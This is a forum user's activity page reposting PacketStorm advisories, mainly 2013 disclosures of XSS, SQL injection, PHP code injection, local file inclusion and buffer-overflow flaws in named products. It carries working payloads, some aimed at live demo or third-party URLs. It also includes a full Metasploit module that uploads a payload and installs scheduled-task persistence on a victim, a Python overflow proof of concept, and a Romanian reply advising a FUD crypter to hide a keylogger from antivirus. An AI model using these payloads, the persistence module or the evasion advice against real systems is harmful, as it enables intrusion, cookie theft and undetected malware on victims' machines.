Jump to content

Praetorian503

Active Members
 View Profile  See their activity

  • Posts

    578

  • Joined

  • Last visited

  • Days Won

    5

 Content Type 

Everything posted by Praetorian503

  1. Praetorian503
    WordPress Responsive Logo Slideshow plugin suffers from a cross site scripting vulnerability. ############################# Exploit Title : Reflective/Stored XSS in Responsive Logo Slideshow Plugin Cross-Site Scripting Vulnerability Author: Aditya Balapure home: http://adityabalapure.blogspot.in/ Date: 18/02/13 software link: http://wordpress.org/extend/plugins/responsive-logo-slideshow/ CVE Assigned - CVE-2013-1759 ############################# Responsive Logo Slideshow Plugin description The Responsive Logo Slideshow Plugin in Wordpress http://wordpress.org/extend/plugins/responsive-logo-slideshow/ has a Reflected/Stored? XSS Vulnerability in the URL and Image input box. If a malicious user is able to inject a script that may affect each and every viewer who visits the website. Once a malicious user compromises the login credentials, he may use these input fields to store malicious scripts and thus carry on a passive attack. ########################## XSS location URL and Image input box. Script Used- ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ########################## Vendor Notification 05/02/2013 to: - Vendor notified awaiting action 17/02/2013 - The Plugin has been removed from the repository by the Wordpress Team Source: PacketStorm
  2. Praetorian503
    MIMEsweeper for SMTP version 5.5 Personal Message Manager suffers from multiple cross site scripting vulnerabilities. Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM) Vendor: Clearswift Ltd Vendor URL: http://www.clearswift.com/ Category: Reflective XSS Google dork: inurl:/MSWPMM/ Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com] [Vulnerability Reproduction] 1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script> 2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script> 3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script> 4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script> 5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script> 6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script> 9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script> [Time-line] 17/07/2009 - Initial discovery 13/01/2012 - Notified vendor 13/01/2012 - Vendor responded 16/01/2012 - Vendor requested more information 16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate 16/01/2012 - Informed vendor for evaluation progress, v5.5.0 is vulnerable too 17/01/2012 - Telephone conversation with vendor in regards the findings 17/01/2012 - Assigned vulnerability reference MSW-1459 25/01/2012 - Requested status update 25/01/2012 - Vendor replied "There is no update on MSW-1459." 16/02/2012 - Requested status update 26/02/2012 - Vendor replied "There is no update on MSW-1459." 23/03/2012 - Requested status update 23/03/2012 - Vendor replied "There is no update on MSW-1459." 09/05/2012 - Requested status update and gave a notice for public disclosure 11/05/2012 - Vendor replied "There is no update on MSW-1459." 18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team 07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release 07/06/2012 - Requested due to date for next release 12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012 13/06/2012 - We suggested to postpone the disclosure after the patch be public 06/12/2012 - Requested status update 06/12/2012 - Vendor sent details for patch 28/01/2013 - Patch is applicable for 5.5.1 09/02/2012 - We requested for demo license to verify fix 15/02/2013 - Vendor could not produce demo license for us to verify the fix 15/02/2013 - Vendor closes incident ticket 18/02/2013 - Public disclosure date Source: PacketStorm
  3. Praetorian503
    Air Transfer 1.2.0 Local File Inclusion Title: ====== Air Transfer v1.2.0 iPad iPhone - File Include Vulnerability Date: ===== 2013-02-14 References: =========== http://www.vulnerability-lab.com/get_content.php?id=849 VL-ID: ===== 849 Common Vulnerability Scoring System: ==================================== 6.3 Introduction: ============= Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection ! Air Transfer moves what you`re seeing or playing on Mac/PC to your iPhone/iPad with just single drag&drop! It moves whatever you want; text memo, website address, photo, music, movie, document and so on. The transferred items are auto-classified into 7-categories according to their type. You can also see or play the items in Air Transfer right away! Air Transfer works even in background mode, you can switch to other apps without stopping current transfer. (Copy of the Homepage: https://itunes.apple.com/de/app/air-transfer/id521595136 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the mobile Air Transfer v1.2.0 app for the apple ipad & iphone. Report-Timeline: ================ 2013-02-14: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: Air Transfer Application - (iPad & iPhone) 1.2.0 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A local file include web vulnerability via POST request method is detected in the mobile WirelessFiles v1.1 app for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. The vulnerbility is located in the upload file module of the webserver (http://192.168.0.10/) when processing to load a manipulated filename via POST. The execution of the injected path or file request will occur when the attacker is opening the generated links in the file dir listing. First the remote attacker drag&drop (copy) a manipulated link with system path or local files to request. He adds the local file request and in the secound step the attacker opens the generated link in the listing to execute the code out of the index module. Exploitation of the web vulnerability requires low privileged application user account without user interaction. Successful exploitation of the vulnerability results in unauthorized path or file access via local file or path include attack. Vulnerable Application(s): [+] Air Transfer v1.2.0 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload Vulnerable Function(s): [+] Drag&Drop & Listing (Web Server) [Remote] Vulnerable Parameter(s): [+] name (Drop Web Addr Here) [+] filename (Drop Web Addr Here) Affected Module(s): [+] Air Transfer Filename Index - Listing Proof of Concept: ================= The local file include web vulnerability can be exploited by remote attackers without required user interaction and with privileged application user account. For demonstration or reproduce ... Input: (Upload) http://192.168.0.10:8080/Upload Example: http://[Server]:[PORT]/[Local File or Path Include] PoC: http://192.168.0.10:8080/var/mobile/Applications/2D31A1B7-6A58-42CE-A5B2-EB7307BE5B6F/AirScrap2%20Lite.app/note.png ../var/mobile/Applications/2D31A1B7-6A58-42CE-A5B2-EB7307BE5B6F/AirScrap2 Lite.app/note.png --- POST --- =-----------------------------19781325924485 Content-Disposition: form-data; name=``[Local File or Path Include]``; filename=``[Local File or Path Include].jpg`` Content-Type: image/jpeg ÿØÿà 192.168.0.10:8080 --- Manually steps to reproduce ... 1. Buy the application Air Transfer of the apple app store 2. Install the application and start it the service on your ipad or iphone 3. Open the air transfer file dir service application http://192.168.0.10:8080/ 5. Start your browser session tamper tool to manipulate the post request live 4. Use the Drag&Drop function to upload via http://192.168.0.10:8080/Upload and choose any random file 5. Submit the random picture and exchange the name and filename values (POST) with your local path or file request 7. Refresh the index listing of the main service http://192.168.0.10:8080 and open the generated link with your path/file request 8. The path or file will be loaded and is accessable 9. The application can be compromised by mobile webshell uploads and other malicious and persistent injected context 10. Successful reproduced ... done! Risk: ===== The security risk of the local file include web vulnerability is estimated as high(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
  4. Praetorian503
    Open Review Script suffers from a cross site scripting vulnerability. ######################################################################### # __ .__ .__ # # |__|____ ____ |__| ______ ___________ _______|__| ____ ______ # # | \__ \ / \| |/ ___// ___/\__ \\_ __ \ |/ __ \ / ___/ # # | |/ __ \| | \ |\___ \ \___ \ / __ \| | \/ \ ___/ \___ \ # #/\__| (____ /___| /__/____ >____ >(____ /__| |__|\___ >____ > # #\______| \/ \/ \/ \/ \/ \/ \/ # # www.janissaries.org # ##=====================================================================## xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx «««:»»» Open Review Script-Cross Site Scripting (XSS) attacks «««:»»» xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ./Title Exploit : Open Review Script-Cross Site Scripting (XSS) attacks ./WebApps URL :http://openreviewscript.org/ ./WebApps Download :http://openreviewscript.org/files/OpenReviewScript-v1.0.1.zip ./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ] ./Security Risk : [ High Level ] ./Category XPL : [ WebApps] ./Time & Date : 18.02.2013. 10:300 PM. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################################################# # #[~] Xss on Demo Site (Searchbox) #http://openreviewscript.org/scriptdemo/results/search # # # # #If you try; you may open demo site and xss attack code to Searchbox. # # CAPS http://www.hizliresimyukle.com/images/2013/02/18/d9YPV.png # #<ScRiPt >prompt(978524)</ScRiPt> #<script>alert('TheMirkin')</script> # # # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx # # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy) ################################################################################# Source: PacketStorm
  5. Praetorian503
    Scripts Genie Pet Rate Pro version 4.9.9 suffers from remote SQL injection and code injection vulnerabilities. ######################################################################### # __ .__ .__ # # |__|____ ____ |__| ______ ___________ _______|__| ____ ______ # # | \__ \ / \| |/ ___// ___/\__ \\_ __ \ |/ __ \ / ___/ # # | |/ __ \| | \ |\___ \ \___ \ / __ \| | \/ \ ___/ \___ \ # #/\__| (____ /___| /__/____ >____ >(____ /__| |__|\___ >____ > # #\______| \/ \/ \/ \/ \/ \/ \/ # # www.janissaries.org # ##=====================================================================## # Author(Pentester): TheMirkin # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy) #------------------------------------------------------------------------ # Exploit Title: Pet Rate Pro Multi Vulnerability # Google Dork: # Date: # scripts Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=pet_rate_pro # Version: 4.9.9 # # Tested on: Win7,BackTrack5 # ##======================================================================= #=> Exploit: SQL injection http://[target]/[path]//demo/PetRatePro/index.php?cmd=4 Demo: URL encoded POST input username was set to 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(82),CHAR(65),CHAR(101),CHAR(74),CHAR(100),CHAR(109),CHAR(55)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' #=> Exploit: Code Ýnjection http://[target]/[path]/index.php?cmd=10&ty="%3bprint(TheMirkin_janissaries_Pentester)%3b%24a%3d" Demo: http://scriptsgenie.com/demo/PetRatePro/index.php?cmd=10&ty=%22%3bprint%28TheMirkin_janissaries_Pentester%29%3b%24a%3d%22 ##======================================================================= Source: PacketStorm
  6. Praetorian503
    ZeroClipboard version 1.0.7 suffers from a cross site scripting vulnerability. Hello list! These are Cross-Site Scripting vulnerabilities in ZeroClipboard. Last week I've made my research of these vulnerabilities and informed all developers (previous and current) of ZeroClipboard. When I've downloaded ZeroClipboard in September 2011, when I was writing my article Attacks via clipboard (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008056.html), where I wrote about different attacks via clipboard, such as XSS, CAS (which leads to DoS or Code Execution), attacks on download managers which monitor clipboard (which leads to manual downloading of malware or even Automatic File Download), clipboard spamming, clipboard phishing and clipboard malwaring, I mentioned about it in the article. That my examples of JavaScript code (for IE) or ActionScript code (for all browses) can be used for such attacks, or to use ZeroClipboard. ------------------------- Affected products: ------------------------- Vulnerable are ZeroClipboard 1.0.7 and previous versions. This is concerning ZeroClipboard developed by original author (Joseph Huckaby). There are new versions, developed by new authors (Jon Rohan and James M. Greene), in which they became fixing these vulnerabilities - one XSS in 1.0.8 and another in 1.1.4 version. The last version ZeroClipboard 1.1.7 is not affected. Original version by Joseph has two flash-files (ZeroClipboard.swf and ZeroClipboard10.swf) and newer versions by Jon and James have only one flash-file (ZeroClipboard.swf). ---------- Details: ---------- In September 2011 I've not made any assessment of ZeroClipboard, so draw attention only on XSS via copying to buffer (it exists in test.html from archive of original ZeroClipboard, because flash-application doesn't sanitize input before copying into buffer, similarly as it can be used for above-mentioned XSS attacks via pasting). This XSS can be triggered at testing page, where information about copied text is shown and XSS occurs, or at pasting into html-forms (as described in my article). Then hip made his assessment of ZeroClipboard recently (http://packetstormsecurity.com/files/119968/WordPress-WP-Table-Reloaded-Cross-Site-Scripting.html). He draw attention only concerning this flash-file in WP-Table-Reloaded plugin for WordPress, but it's not just part of the plugin, it's third-party application, which is used in multiple web applications and at multiple sites (as standalone, as in different webapps). So I'm giving detailed information about ZeroClipboard. I suggest instead of hip's payload "a\%22))}catch(e){alert(1)}//" to use my variant - in this case there will be no cyclings of alertbox. http://site/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)// Cross-Site Scripting (WASC-08): In WP-Table-Reloaded XSS works just with parameter id (this is modified version of swf-file, so there are different modification of it). In official version of ZeroClipboard it'll not work without "&width&height", so it's needed to set all parameters. http://site/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height http://site/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height And XSS via copying XSS payload into buffer, described above. This is very widespread flash-file (both versions), as you can find out via Google dorks. inurl:zeroclipboard.swf - about 80500 results inurl:zeroclipboard10.swf - about 9520 results Some of these zeroclipboard.swf can be newer versions (with fixed XSS), but tens of thousands of swf-files (and sites with them) are vulnerable. For last 14,5 years I saw ZeroClipboard and similar flash-files (for copying into clipboard) at a lot of web sites. From small sites, till large sites, such as slideshare.net (this is just one more hole to those multiple holes, which I've informed them about during last years, and they always don't care about security of their site - or ignored vulnerabilities, or hiddenly fixed one hole without any response - typical lame approach, so this hole is going directly to full disclosure). http://www.slideshare.net/javascripts/plugins/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source: PacketStorm
  7. Praetorian503
    This Metasploit module creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires 'Logon as a batch job' permissions (SeBatchLogonRight). ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/windows/priv' require 'msf/core/exploit/exe' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Exploit::EXE def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage User Level Persistent Payload Installer', 'Description' => %q{ Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires 'Logon as a batch job' permissions (SeBatchLogonRight). }, 'License' => MSF_LICENSE, 'Author' => [ 'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>', 'Brandon McCann "zeknox" <bmccann[at]accuvant.com>' ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/'] ] )) register_options( [ OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires']), OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['logon', 'lock', 'unlock','schedule', 'event']]), OptString.new('REXENAME',[false, 'Name of exe on remote system']), OptString.new('RTASKNAME',[false, 'Name of exe on remote system']), OptString.new('PATH',[false, 'PATH to write payload']) ], self.class) register_advanced_options( [ OptString.new('EVENT_LOG', [false, 'Event trigger: The event log to check for event']), OptInt.new('EVENT_ID', [false, 'Event trigger: Event ID to trigger on.']), OptString.new('XPATH', [false, 'XPath query']) ], self.class) end def exploit if not (sysinfo['OS'] =~ /Build [6-9]\d\d\d/) fail_with(Exploit::Failure::NoTarget, "This module only works on Vista/2008 and above") end if datastore['TRIGGER'] == "event" if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil? print_status("The properties of any event in the event viewer will contain this information") fail_with(Exploit::Failure::BadConfig, "Advanced options EVENT_LOG and EVENT_ID required for event") end end # Generate payload payload = generate_payload_exe # Generate remote executable name rexename = generate_rexename # Generate path names xml_path,rexe_path = generate_path(rexename) # Upload REXE to victim fs upload_rexe(rexe_path, payload) # Create basic XML outline xml = create_xml(rexe_path) # Fix XML based on trigger xml = add_xml_triggers(xml) # Write XML to victim fs, if fail clean up write_xml(xml, xml_path, rexe_path) # Name task with Opt or give random name schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) # Create task with modified XML create_task(xml_path, schname, rexe_path) end ############################################################## # Generate name for payload # Returns name def generate_rexename rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" if not rexename =~ /\.exe$/ print_warning("#{datastore['REXENAME']} isn't an exe") end return rexename end ############################################################## # Generate Path for payload upload # Returns path for xml and payload def generate_path(rexename) # generate a path to write payload and xml path = datastore['PATH'] || expand_path("%TEMP%") xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" rexe_path = "#{path}\\#{rexename}" return xml_path,rexe_path end ############################################################## # Upload the executable payload # Returns boolean for success def upload_rexe(path, payload) vprint_status("Uploading #{path}") if file? path fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") end begin write_file(path, payload) rescue => e fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}") end print_status("Successfully uploaded remote executable to #{path}") end ############################################################## # Creates a scheduled task, exports as XML, deletes task # Returns normal XML for generic task def create_xml(rexe_path) xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml") xml_file = File.new(xml_path,"r") xml = xml_file.read xml_file.close # Get local time, not system time from victim machine begin vt = client.railgun.kernel32.GetLocalTime(32) ut = vt['lpSystemTime'].unpack("v*") t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) rescue print_warning("Could not read system time from victim...using your local time to determine creation date") t = ::Time.now end date = t.strftime("%Y-%m-%d") time = t.strftime("%H:%M:%S") # put in correct times xml = xml.gsub(/DATEHERE/, "#{date}T#{time}") domain, user = client.sys.config.getuid.split('\\') # put in user information xml = xml.sub(/DOMAINHERE/, user) xml = xml.sub(/USERHERE/, "#{domain}\\#{user}") xml = xml.sub(/COMMANDHERE/, rexe_path) return xml end ############################################################## # Takes the XML, alters it based on trigger specified. Will also # add in expiration tag if used. # Returns the modified XML def add_xml_triggers(xml) # Insert trigger case datastore['TRIGGER'] when 'logon' # Trigger based on winlogon event, checks windows license key after logon print_status("This trigger triggers on event 4101 which validates the Windows license") line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]" xml = create_trigger_event_tags("Application", line, xml) when 'lock' xml = create_trigger_tags("SessionLock", xml) when 'unlock' xml = create_trigger_tags("SessionUnlock", xml) when 'event' line = "*[System[(EventID=#{datastore['EVENT_ID']})]]" if not datastore['XPATH'].nil? and not datastore['XPATH'].empty? # Append xpath queries line << " and #{datastore['XPATH']}" # Print XPath query, useful to user to spot issues with uncommented single quotes print_status("XPath query: #{line}") end xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml) when 'schedule' # Change interval tag, insert into XML if datastore['FREQUENCY'] != 0 minutes = datastore['FREQUENCY'] else print_status("Defaulting frequency to every hour") minutes = 60 end xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<") # Insert expire tag if not 0 unless datastore['EXPIRE_TIME'] == 0 # Generate expire tag end_boundary = create_expire_tag # Inject expire tag insert = xml.index("</StartBoundary>") xml.insert(insert + 16, "\n #{end_boundary}") end end return xml end ############################################################## # Creates end boundary tag which expires the trigger # Returns XML for expire def create_expire_tag() # Get local time, not system time from victim machine begin vt = client.railgun.kernel32.GetLocalTime(32) ut = vt['lpSystemTime'].unpack("v*") t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) rescue print_error("Could not read system time from victim...using your local time to determine expire date") t = ::Time.now end # Create time object to add expire time to and create tag t = t + (datastore['EXPIRE_TIME'] * 60) date = t.strftime("%Y-%m-%d") time = t.strftime("%H:%M:%S") end_boundary = "<EndBoundary>#{date}T#{time}</EndBoundary>" return end_boundary end ############################################################## # Creates trigger XML for session state triggers and replaces # the time trigger. # Returns altered XML def create_trigger_tags(trig, xml) domain, user = client.sys.config.getuid.split('\\') # Create session state trigger, weird spacing used to maintain # natural Winadows spacing for XML export temp_xml = "<SessionStateChangeTrigger>\n" temp_xml << " #{create_expire_tag}" unless datastore['EXPIRE_TIME'] == 0 temp_xml << " <Enabled>true</Enabled>\n" temp_xml << " <StateChange>#{trig}</StateChange>\n" temp_xml << " <UserId>#{domain}\\#{user}</UserId>\n" temp_xml << " </SessionStateChangeTrigger>" xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml) return xml end ############################################################## # Creates trigger XML for event based triggers and replaces # the time trigger. # Returns altered XML def create_trigger_event_tags(log, line, xml) # Fscked up XML syntax for windows event #{id} in #{log}, weird spacind # used to maintain natural Windows spacing for XML export temp_xml = "<EventTrigger>\n" temp_xml << " #{create_expire_tag}\n" unless datastore['EXPIRE_TIME'] == 0 temp_xml << " <Enabled>true</Enabled>\n" temp_xml << " <Subscription><QueryList><Query Id=\"0\" " temp_xml << "Path=\"#{log}\"><Select Path=\"#{log}\">" temp_xml << line temp_xml << "</Select></Query></QueryList>" temp_xml << "</Subscription>\n" temp_xml << " </EventTrigger>" xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml) return xml end ############################################################## # Takes the XML and a path and writes file to filesystem # Returns boolean for success def write_xml(xml, path, rexe_path) if file? path delete_file(rexe_path) fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") end begin write_file(path, xml) rescue delete_file(rexe_path) fail_with(Exploit::Failure::Unknown, "Issues writing XML to #{path}") end print_status("Successfully wrote XML file to #{path}") end ############################################################## # Takes path and delete file # Returns boolean for success def delete_file(path) begin file_rm(path) rescue print_warning("Could not delete file #{path}, delete manually") end end ############################################################## # Takes path and name for task and creates final task # Returns boolean for success def create_task(path, schname, rexe_path) # create task using XML file on victim fs create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"") if create_task_response =~ /has successfully been created/ print_good("Persistence task #{schname} created successfully") # Create to delete commands for exe and task del_task = "schtasks /delete /tn \"#{schname}\" /f" print_status("#{"To delete task:".ljust(20)} #{del_task}") print_status("#{"To delete payload:".ljust(20)} del #{rexe_path}") del_task << "\ndel #{rexe_path}" # Delete XML from victim delete_file(path) # Save info to notes DB report_note(:host => session.session_host, :type => "host.s4u_persistance.cleanup", :data => { :session_num => session.sid, :stype => session.type, :desc => session.info, :platform => session.platform, :via_payload => session.via_payload, :via_exploit => session.via_exploit, :created_at => Time.now.utc, :delete_commands => del_task } ) elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/ # Clean up delete_file(rexe_path) delete_file(path) error = "The scheduled task name is already in use" fail_with(Exploit::Failure::Unknown, error) else error = "Issues creating task using XML file schtasks" vprint_error("Error: #{create_task_response}") if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "Event" print_warning("Security log can restricted by UAC, try a different trigger") end # Clean up delete_file(rexe_path) delete_file(path) fail_with(Exploit::Failure::Unknown, error) end end end Source: PacketStorm
  8. Praetorian503

    Keylogger?

    Praetorian503 replied to DRA4KE's topic in Off-topic

    Cauti un cripter FUD si criptezi executabilul. Nu incerca sa protejezi 'virusul' prin prezervativ pentru ca nu va functiona. La fete e cam greu ca nu accepta din prima, trebuie sa ai stil.
  9. Praetorian503
    Am gasit ceva interesant la tine pe blog: Link. Se pare ca cineva a facut un post cu titlul asta, dar a fost sters (Probabil un sobolan care este Banned aici).
  10. Praetorian503
    Photodex ProShow Producer version 5.0.3297 suffers from a stack-based buffer overflow vulnerability. When opening a crafted transition file (.pxt) the application loads the "title" value from the pxt file. The application does not properly validate the length of the string loaded from the "title" value from the pxt file before using it in the further application context, which leads to a buffer overflow condition with possible code execution via overwritten SEH chains on Windows XP/7 32bit. Proof of concept code included. Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Photodex ProShow Producer Vendor URL: www.photodex.com Type: Stack-based Buffer Overflow [CWE-121] Date found: 2013-02-16 Date published: 2013-02-16 CVSSv2 Score: 6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) CVE: - 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- Photodex ProShow Producer v5.0.3297, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- A buffer overflow vulnerability has been identified in Photodex ProShow Producer v5.0.3297. When opening a crafted transition file (.pxt) the application loads the "title" value from the pxt file. The application does not properly validate the length of the string loaded from the "title" value from the pxt file before using it in the further application context, which leads to a buffer overflow condition with possible code execution via overwritten SEH chains on Windows XP/7 32bit. An attacker needs to force the victim to open a crafted .pxt file in order to exploit the vulnerability. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in denial-of-service conditions. 5. PROOF-OF-CONCEPT (Code / Exploit) ------------------------------------ The following generated string has to be inserted into a .pxt file to trigger the vulnerability. #!/usr/bin/python file="poc.txt" junk1="\x41" * 24 eip="\x42" * 4 junk2="\xCC" * 50000 poc=junk1 + eip + junk2 try: print ("[*] Creating exploit file...\n"); writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print ("[*] File successfully created!"); except: print ("[!] Error while creating file!"); For further Screenshots and/or PoCs visit: http://security.inshell.net/advisory/47 6. SOLUTION ----------- None 7. REPORT TIMELINE ------------------ 2013-02-16: Discovery of the vulnerability 2013-02-16: Full Disclosure because the vendor ignored previous reports. 8. REFERENCES ------------- http://security.inshell.net/advisory/47 Source: PacketStorm
  11. Praetorian503
